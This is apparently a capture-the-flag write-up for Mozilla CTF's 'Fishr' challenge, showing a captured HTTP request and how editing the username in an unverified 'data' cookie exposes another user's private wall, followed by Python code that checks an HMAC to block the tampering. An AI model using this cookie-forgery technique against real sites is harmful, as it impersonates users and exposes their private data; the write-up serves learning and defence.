Challenge 19 was the first that I began to work on.
19 - Fishr - Fish your messages out of the sea
Please log in to Fishr using the name 0wn and the password pwnthis.
The flag is on fl4gdud3's wall, get it.
gold: 500 +3 (1st), +2 (2nd), +1 (3rd)
This challenge was worth the most points of all the challenges, and I thought it would be a good starting point.
The game play was straightforward: the flag was on Fl4gdud3's wall. I chose to use Burp Suite while I was looking around. Once logged in you can see that you have friends, much like Twitter. As you click around you will see that "admin" is following people, and one of the users following admin happens to be "flagdud3". This was the first piece of the puzzle: now you know the real name you are looking for, not the dude with the 4 in his name.
Upon trying to browse to flagdud3's page you get an error:
Sorry, but there are no visible Posts. This user might have set his wall to private and you lack the permission to read private wall messages.
Now you know that you need to find a way to get to this wall as a different user. Let's turn to Burp and look at the request.
GET /ajax.php?p=wall&arg=flagdud3 HTTP/1.1
Host: challenge19.mozillactf.org
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: https://challenge19.mozillactf.org/index.php
Cookie: data=7%3A0wn%3A0wn%2540spam.com; mac=eccc50cafdb69aac25dba7738651ddff
DNT: 1
Connection: keep-alive
The cookie is the key, and you can see that your username is in it:
7%3A0wn%3A0wn%2540spam.com;
So if you send this request to Repeater and alter the data value to "flagdud3" so that it looks like:
7%3Aflagdud3%3Aflagdud3%2540spam.com;
you will get the response you are looking for:
Kickin' in the front seat - sittin' in the back seat...
<span class="time">- posted at 27.12.2011 16:32</span>
</div>
<div class="post">
<b>flagdud3:</b>
Flag: s0ci4lly4wkw4rd
<span class="time">- posted at 26.12.2011 12:46</span>
And there you have it, 500 points.
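The request above shows the site accepting an edited data cookie while the mac cookie stayed the same. As an added example (not code from the writeup or the challenge server, whose source is unknown), the following shows the same data=id:user:email; mac=... layout with the mac actually verified server-side, so the edit to flagdud3 is rejected; the key, the use of HMAC-SHA256 and the function names are assumptions.

```python
import hmac
import hashlib
from urllib.parse import quote, unquote

# Assumed server-side key; the real challenge server's key is unknown.
SERVER_KEY = b"replace-with-a-random-secret"


def parse_cookie_header(header: str) -> dict:
    """Split 'data=...; mac=...' into a dict of URL-decoded values."""
    fields = {}
    for part in header.split(";"):
        part = part.strip()
        if "=" in part:
            name, value = part.split("=", 1)
            fields[name] = unquote(value)
    return fields


def sign(data: str) -> str:
    """MAC over the whole data field, so no component can be edited alone."""
    return hmac.new(SERVER_KEY, data.encode(), hashlib.sha256).hexdigest()


def issue_cookie(user_id: int, username: str, email: str) -> str:
    """Build the 'data=id:user:email; mac=...' cookie seen in the request."""
    data = f"{user_id}:{username}:{email}"
    return f"data={quote(data, safe='')}; mac={sign(data)}"


def current_user_unchecked(cookie_header: str):
    """Behaviour the writeup implies: the name in 'data' is trusted as-is."""
    data = parse_cookie_header(cookie_header).get("data", "")
    parts = data.split(":")
    return parts[1] if len(parts) == 3 else None


def current_user(cookie_header: str):
    """Hardened lookup: reject the cookie unless the mac verifies."""
    fields = parse_cookie_header(cookie_header)
    data, mac = fields.get("data"), fields.get("mac")
    if data is None or mac is None:
        return None
    # Constant-time comparison avoids leaking the MAC byte by byte.
    if not hmac.compare_digest(sign(data), mac):
        return None
    parts = data.split(":")
    return parts[1] if len(parts) == 3 else None
```

With a real key, the only way to obtain a valid mac for a different user is to hold that key, so the wall request is served for the logged-in account alone.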